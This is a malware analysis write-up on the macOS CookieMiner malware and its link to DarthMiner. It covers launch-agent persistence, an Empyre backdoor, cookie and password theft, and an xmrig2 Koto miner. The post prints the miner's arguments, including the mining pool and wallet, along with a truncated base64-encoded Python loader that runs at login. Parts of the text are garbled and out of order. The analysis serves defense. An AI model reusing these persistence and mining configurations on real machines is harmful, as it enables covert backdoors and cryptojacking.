The persistently installed Empyre backdoor allows remote attacks to run arbitrary commands on an infected host.īy examining the arguments passed to the persistent miner binary, xmrig2 it appears to be mining the Koto cryptocurrency:ġ ProgramArguments 2 3 /Users/Shared/xmrig2 4 -a 5 yescrypt 6 -o 7 stratum+tcp://koto-pool.work:3032 8 -u 9 k1GqvkK7QYEfMj3JPHieBo1m. In our “The Mac Malware of 2018” report we noted that DarthMiner, persists the well known Empyre backdoor (via the file) and a cryptocurrency mining binary named XMRig (via ).ĬookieMiner does this as well (though a 2 has been added to both the mining binary and plist): This is not a coincidence, as (was noted in the Unit 42 report): “ has been developed from OSX.DarthMiner, a malware known to target the Mac platform”Ĭapabilities: Cryptomining, Cookie/Password Stealing, BackdoorĬookieMiner is likely the evolution of OSX.DarthMiner. (We also covered OSX.DarthMiner in our “The Mac Malware of 2018” report). This is performed during the first stage of the infection, via a shell script named `uploadminer.sh`:ġ 2 3 4 5 Label 6 7 ProgramArguments 8 9 python 10 -c 11 import sys,base64,warnings warnings.filterwarnings('ignore') exec(base64.b64decode(ġ2 'aW1wb3J0IHN5cztpbXBvcnQgcmUsIHN1YnByb2Nlc3M7Y21kID0gInBzIC1lZiB8IGdyZXAgTGl0dGxlXCBTbmlġ4 hcileU1soU1tpXStTW2pdKSUyNTZdKSkKZXhlYygnJy5qb2luKG91dCkp')) Īs the RunAtLoad key is set to true in this property list as well, the python commands will be automatically (re)executed each time the user logs in.ĭoes this look familiar? Yes! In fact this is exactly how OSX.DarthMiner persisted. …as such, CookieMiner’s infection vector remains unknown.Īs noted in Unit 42's (), `CookieMiner` persists two launch agents. "(), deputy director of Threat Intelligence for Unit 42, told Threatpost that researchers are not certain how victims are first infected by the shell script, but they suspect victims download a malicious program from a third-party store." However, a ThreatPost writeup states that: Unit 42 (of Palo Alto Networks) who uncovered CookieMiner and wrote the original report on the malware, made no mention the malware’s initial infection vector. “Mac ‘CookieMiner’ Malware Aims to Gobble Crypto Funds”.
0 Comments
Leave a Reply. |